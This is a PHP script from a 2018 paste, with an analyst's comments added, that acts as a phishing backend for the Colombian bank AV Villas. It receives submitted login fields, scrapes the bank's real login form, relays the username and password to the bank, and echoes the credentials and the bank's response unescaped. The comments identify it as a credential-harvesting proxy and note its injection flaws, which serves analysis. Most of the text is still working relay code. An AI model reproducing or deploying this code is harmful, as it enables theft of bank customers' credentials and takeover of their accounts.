process.php

a guest Sep 21st, 2018 177 Never
  1. <?php
     // Analyst summary: this script takes the fields of a submitted login form
     // ($_POST), fetches the login page of www.avvillas.com.co from the server
     // side, scrapes the form action and the JSF hidden fields out of the HTML,
     // replays the submitted fields to that form action, and echoes every step
     // (including the credentials) back to the browser. That is a server-side
     // credential relay. The page does not state its purpose; a third-party host
     // running it receives customers' banking credentials in clear and should be
     // handled as a credential-harvesting proxy.
     // xtCurl comes from xtCurl.php, which is not part of this paste; what
     // httpRequest() does with each config key is inferred from the key names.

     // Lifts PHP's execution time limit for the outbound requests below.
  2. set_time_limit(0);
     // Replaces the real client address with '127.0.3' plus a random integer.
     // In this file the value is only used to build the cookie file name
     // (cookie_<value>.txt), so every run gets its own file and the real client
     // address never appears in it.
     // NOTE(review): whether xtCurl.php also reads REMOTE_ADDR cannot be seen here.
  3. $_SERVER['REMOTE_ADDR'] = '127.0.3' . mt_rand();
  4.  
  5.  
     // The POST guard is commented out (see the matching brace at the end), so
     // everything below also runs on requests that carry no form data.
  6. //if($_POST){
  7.  
     // Dumps every submitted field, password included, into the response.
     // print_r output is not HTML-escaped.
  8. echo '<pre>';print_r($_POST);
  9. echo '</pre>';
  10.    
  11.     require_once('xtCurl.php');
  12.  
          // Username and password as submitted. The key prefix looks like a
          // portal-generated namespace copied from the bank's own login form,
          // presumably so the relayed request carries the field names the bank
          // expects; confirm against the live form.
  13.     $user = $_POST['viewns_Z7_2GDG0A41LGN4C0A55BKUGT18P2_:usuInput'];
  14.     $pass = $_POST['viewns_Z7_2GDG0A41LGN4C0A55BKUGT18P2_:xPassInput'];
  15.  
  16.     $xtCurl = new xtCurl();
  17.  
          // GET the bank's login page. The submitting browser's User-Agent is
          // forwarded, so the User-Agent header alone does not distinguish this
          // request from the customer's own browser; the source address is this
          // server's, and the script requests only the login HTML itself.
          // 'cookie_name' is presumably the cookie file xtCurl reads and writes.
  18.     //Step 1
  19.     $config = array(
  20.         'url' => 'https://www.avvillas.com.co/wps/portal/avvillas/banco/login/',
  21.         'referer' => 'https://www.avvillas.com.co/wps/portal/avvillas/banco/login/',
  22.         'type' => 'GET',
  23.         'user_agent' => $_SERVER['HTTP_USER_AGENT'],
  24.         'cookie_name' => 'cookie_' . $_SERVER['REMOTE_ADDR'] . '.txt'
  25.     );
  26.     $mainSource = $xtCurl->httpRequest($config);
          // Everything up to "/p0/" in the javax.faces.encodedURL hidden field is
          // used as the path of the Referer sent with the POST below. None of the
          // preg_match calls check their result, so $location[1] and $formUrl[1]
          // are undefined whenever the page markup differs from these patterns.
  27.     preg_match("/name=\"javax.faces.encodedURL\" value=\"(.*?)\/p0\//", $mainSource, $location);
  28.     $loginUrl = 'https://www.avvillas.com.co' . $location[1] . '/';
  29.  
          // Form action, encodedURL and ViewState scraped from the same HTML.
          // Only $formUrl is used afterwards; $javaxFacesEncodeUrl appears only in
          // commented-out code and $javaxFacesViewState is never read in this file.
  30.     preg_match("/action=\"(.*?)\" enctype=\"application\/x\-www\-form\-urlencoded\" class=\"signup\-form\">/", $mainSource, $formUrl);
  31.     preg_match("/class=\"signup-form\"><input type=\"hidden\" name=\"javax.faces.encodedURL\" value=\"(.*?)\" \/>/", $mainSource, $javaxFacesEncodeUrl);
  32.     preg_match("/SUBMIT\" value=\"1\" \/><input type=\"hidden\" name=\"javax.faces.ViewState\" id=\"javax.faces.ViewState\" value=\"(.*?)\" \/>/", $mainSource, $javaxFacesViewState);
  33.  
          // The paste has no "step 2". This step rebuilds the POST body from the
          // submitted form fields.
  34.     //Step 3
  35.     $data = '';
          // Credentials are written to the response in clear text, unescaped.
  36.     echo 'User: ' . $user .' <br/> Pass: ' . $pass . '<Br />';
  37.     //$postData = file_get_contents('php://input');
  38.     foreach($_POST as $id => $value){
              // PHP rewrites dots in incoming field names to underscores; this
              // restores the javax.faces.* names before the fields are re-sent.
  39.         $id = str_replace('javax_faces_', 'javax.faces.', $id);
  40.  
  41.         //if($id != 'viewns_Z7_2GDG0A41LGN4C0A55BKUGT18P2_:passInput')
  42.             //$value  = urlencode($value);
  43.  
              // Name and value are joined as-is; the urlencode call above is
              // commented out, so no encoding is applied to either.
  44.         $data .= $id . '=' . $value . '&';
  45.     }
          // Drops the trailing '&'.
  46.     $data = substr($data, 0, strlen($data) - 1);
  47.     echo 'Longitud: ' . strlen($data) . '<br />';
  48.     $postData = $data;
          // The rebuilt body, credentials included, is reflected without
          // htmlspecialchars(): a field value containing "</textarea>" is
          // rendered as markup on this page.
  49.     echo '<textarea rows="10" cols="200" style="font-size:13px;">' . $postData . '</textarea>';
  50.    
          // Target of the relayed login: the bank host plus the scraped form action.
  51.     $loginUrlPost = 'https://www.avvillas.com.co' . $formUrl[1];
  52.  
  53.     //$loginUrlPost = explode('p0/IZ', $javaxFacesEncodeUrl[1]);
  54.     //$loginUrlPost = 'https://www.avvillas.com.co' . $loginUrlPost[0];
          // POST the rebuilt body to the bank using the same cookie file name as
          // the GET above and the scraped login URL as Referer.
  55.     $config = array(
  56.         'url' => $loginUrlPost,
  57.         'referer' => $loginUrl,
  58.         'type' => 'POST',
  59.         'user_agent' => $_SERVER['HTTP_USER_AGENT'],
  60.         'form_data' => $postData,
  61.         'cookie_name' => 'cookie_' . $_SERVER['REMOTE_ADDR'] . '.txt'
  62.     );
  63.     $login = $xtCurl->httpRequest($config);
          // Debug output of the request parameters, then the bank's raw response
          // body, which is also echoed without escaping.
  64.     echo 'POST:' . $_POST['javax_faces_encodedURL'] .'<Br />';
  65.     echo 'URL: ' . $loginUrlPost . '<br />';
  66.     echo 'Referer:' . $loginUrl .'<Br />';
  67.     echo '<br /><textarea rows="20" cols="200">' . $login . '</textarea>';
      // Disabled block: a follow-up GET of the login URL with the logged-in home
      // page as Referer, reusing the same cookie file name. It never runs.
  68. /*
  69.     $config = array(
  70.         'referer' => 'https://www.avvillas.com.co/wps/portal/avvillas/banco/home-logueado#Z7_2GDG0A41LGN4C0A55BKUGT18P2',
  71.         'type' => 'GET',
  72.         'url' => 'https://www.avvillas.com.co/wps/portal/avvillas/banco/login/',
  73.         'user_agent' => $_SERVER['HTTP_USER_AGENT'],
  74.         'cookie_name' => 'cookie_' . $_SERVER['REMOTE_ADDR'] . '.txt'
  75.     );
  76.     $login = $xtCurl->httpRequest($config);
  77.     echo '<textarea rows="5" cols="200">' . $login . '</textarea>';*/
  78.  
  79. //}
  80. ?>